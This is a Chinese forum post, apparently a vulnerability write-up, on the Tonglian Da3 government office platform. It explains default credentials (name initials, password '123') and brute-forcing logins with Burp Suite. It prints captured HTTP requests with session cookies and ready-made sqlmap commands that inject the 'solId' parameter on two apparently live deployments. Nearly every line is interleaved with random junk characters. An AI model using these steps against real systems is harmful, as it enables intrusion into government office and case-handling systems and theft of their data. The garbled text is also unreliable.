|
( H! O8 u0 i8 P- k6 a8 O K. n
- `; I' {3 E v+ \4 G7 I 2 x+ P" w6 h7 D$ x' R
/ V- ]5 J9 V* b
平台简介:7 }. C" ^3 W, f$ D2 }
' p! P9 w5 @& ?( ^" H7 B1 j* [
, F, c' x$ T: s% m 2 Q: X/ c8 K9 a
& I; g3 J& Q; t+ l, L
0 ^2 K( S; R) Z l8 k% T3 l2 ] 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
! R2 G0 U/ i# i. ?7 B* Y& _1 G
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
6 A9 u; y' l3 N2 n) @6 Z2 G3 s" y. T
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
' F2 d. \4 L1 i. a" l5 r
$ c# w. O8 m. l: Q6 y" }0 ]
6 ^- a; K$ w7 x- r! C
2 Z/ k3 Y5 W( r( @7 V$ A* T8 s/ k* |0 C 6 ~. t: y1 `+ M* b9 l+ W
- [4 j& R# M8 u, M; f
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
2 S8 s0 B. l+ P# a 6 ]7 e0 V5 `+ U9 `* k3 q
, x6 m: p$ i- E% I& ]1 r
# E% z0 b4 o% O5 D0 _3 C2 X9 \* X
4 v9 z# U7 G& R! q* q9 z6 ` X3 B
: O$ D5 y C u- [# g http://1.1.1.1:7197/cap-aco/#(案例2-)% D" f) ]; R, j, k1 g
4 l7 P+ W0 Z0 O! h! J
' X; L$ }5 X( _$ I$ K http://www.XXOO.com (案例1-官网网站)' _1 z( N8 u) H& Y# o
- K; \; O& g; r0 B3 T' e5 X
+ ?! X; F3 {( o6 b
, w6 U4 G7 z2 @
2 h8 w* J, _* W
7 G2 S% l/ _5 v5 c- a 漏洞详情:; [/ ^ n: I1 T0 r& U
8 C! U: `- v0 R' V0 ]0 Q, Q( W. p7 `$ f0 B
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
5 t0 N3 f0 e! R) x! J# d $ G! G" p0 l0 A
: I+ t2 l( E; d 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:& ?; ?) p I6 a+ r! `9 d2 o8 z; Y, W7 H
1 A* |- B* ^% Z: o0 G% O, ^
- E* E* o, ^: W$ s7 q' T. u ! L$ m. w! c1 j0 d+ k; J. e1 V8 Q" H
6 H* ? f! U6 l, m
* O/ \# }: B9 E, Q' ~  + ]& {, @9 |5 ?5 S; k
8 r0 V7 C0 Z6 u X& g
8 Q) v3 e# a3 t: N* i status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
* `! W/ j. Z! o 4 R, P7 }( y9 ?8 a& z2 a: V7 @
! v @2 ^: e# j9 C I 1、案例1-官方网站( P- d, f1 L4 ]/ t/ u5 S' y" i
9 \0 i4 x5 D: ?0 h- U& o
, X V9 l3 B- N GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
, h" R7 H. Y2 E1 s ) h. w6 z* T" \$ L0 C
) I. [; ~/ Q( k9 Z1 {) K/ N Host: www.XXOO.com
8 G! [; l4 X! [+ `
( [" x6 L7 `; H0 j5 o6 n) W1 T
8 E' p1 T' o. P, j* H( ]: F# I) Z Proxy-Connection: Keep-Alive1 M, U/ {3 e0 |
( }' m; `& X0 @5 x8 L3 Y
1 i& x2 q+ ^, q, j" _2 J Accept: application/json, text/javascript, */*; q=0.014 E) E1 X1 q2 g1 R+ T8 G
2 s- E- t* H7 }' q) z& T9 `2 ]7 R, J
: P; U& Y5 x1 P- S, T+ R4 T. D, T) j Accept-Language: zh-CN* e9 c( i' a2 U4 K' s. a+ a
' X5 S/ V9 I# ^- o$ v
" L& X7 Y; Q0 }/ L4 x Content-Type: application/json' E9 p& ^* M7 E' w/ N
0 H; n9 u6 x. S+ ?% v6 |8 u. S7 X
& S1 k7 i5 `4 Y# u4 g& j T
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
# y H; W7 X: ]3 x" |8 c / d! q1 t8 Y! A& X$ ~) ~6 f& N
! b! Z" s3 x3 F; S. W4 `# {
X-Requested-With: XMLHttpRequest
( d. F6 A* X8 W) Z3 y 1 B! m: q4 }) Y9 D+ r2 D
1 l- b" a5 J2 e$ M; o Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
6 l) Q7 b8 g2 w
7 i4 r- t- c: f+ E7 ?& ~; F( B" m' q* `: |6 F% B2 q
Accept-Encoding: gzip, deflate, sdch
" M7 \+ K! t5 M p K
1 |0 w# f" s M/ @
3 @0 q; I, o. r Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
0 Y" G4 d9 \7 k6 h. M
5 o" @ f9 g# t8 o) o/ w+ o9 H7 Y- Q4 Y; M/ H- w3 b$ @5 u& L7 O2 n
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:0 {0 }8 r! l6 H( h! S2 a. H* K
* w0 n: S: C( |& Q4 }. Z
% n5 o7 g7 I* K$ X  * w& C2 @8 M; p. c7 Q
3 h( }+ t( o3 c$ T
7 |& e7 g0 F9 j( n# w6 E 
& q' b- U; @+ P& F9 W5 A, o
" U6 o/ Q! _5 r- L3 J4 F4 p7 H* E6 k% \( W- \
- c+ F1 {! K1 _% M( O3 K! f, d% J1 T K
9 i8 z2 S e9 d: b
. S6 Y1 s; p1 ^, W4 ~) P
, \, S4 v1 U4 S0 k( |& R
; `9 ?/ I& W n+ h7 Y
N$ J3 `* s2 N \ , y! C1 v$ z- g1 X# N/ p; h, O% o
' C4 d$ W O' w! y& h! C) _
- ~. f+ }; K( a: o* k/ a 2、案例2-某天河云平台# h, b; ^) z" ~% p* J4 [+ o
: O6 n" U2 R1 z4 ] G4 L& q
( i* f; z W6 c0 K6 E% R S+ R" j) S
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
! \1 r* l' {' }
5 g0 Z. ~2 O& E# @, X B% O, ?" h/ `; G. ~) \3 A$ [
Host: 1.1.1.:71978 f3 ~4 E* j5 o7 T
% C4 ~, h( p. J4 Z7 P
" D6 `3 h" J( p0 E" I( b7 n Accept: application/json, text/javascript, */*; q=0.01 B2 @5 X+ {6 m+ }8 H" _
4 h+ E- p, K, k! y
# A3 i5 ]5 L7 I* O X-Requested-With: XMLHttpRequest: \ _ }' P9 H$ @+ y _
7 q4 z, e/ y6 C4 Y) D+ M) h* p& i2 i" g
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
- O4 k, ~# I( T# c% \ 8 W4 m( i0 U5 r6 g9 @3 [
3 c, M* Q* y0 F) Q3 _3 M
Content-Type: application/json3 U% H! ?0 }! x* a3 C
$ h J7 p! q3 |5 b& h3 E- q. M) a
8 d; j- j0 I2 O& R. e. P# H7 ? Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008; s% e5 b/ X0 D* f) X
. X1 U" o; P5 r' g5 B% [
: U, Q1 v0 n8 [! {4 v
Accept-Language: zh-CN,zh;q=0.8
9 F) }6 [5 Q( [& r5 P- |8 L5 [$ P 6 C/ o3 {* y/ Y; w( O0 g
4 {; m' c- A5 f/ t$ _9 t* j. O$ }
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1$ g# H3 t# I1 W1 t* E* D" \! A
6 R* g: v6 @6 i1 ~+ c
6 l) Q* @2 ]' I5 H3 ^* X Connection: close$ k* m, j' H. {% L( ^! W
6 x$ b- P5 j# U7 k. p; v! u4 Q% K J2 \( n/ f4 |) \2 c% \$ h- V
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
. Z& J$ r0 Y7 ^8 |4 K ' U% |& O h8 z- m4 [
; R3 b3 z( g2 [* z& s" J* b
 # X# ]: D, g0 ^3 B6 S: Y2 R( T
& H1 v1 |# L% r2 [- G& w$ F J
& u# j9 _! A7 T& R% a1 X3 R9 @' {
! ?7 H: U+ `: {4 w C6 N& r" p
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对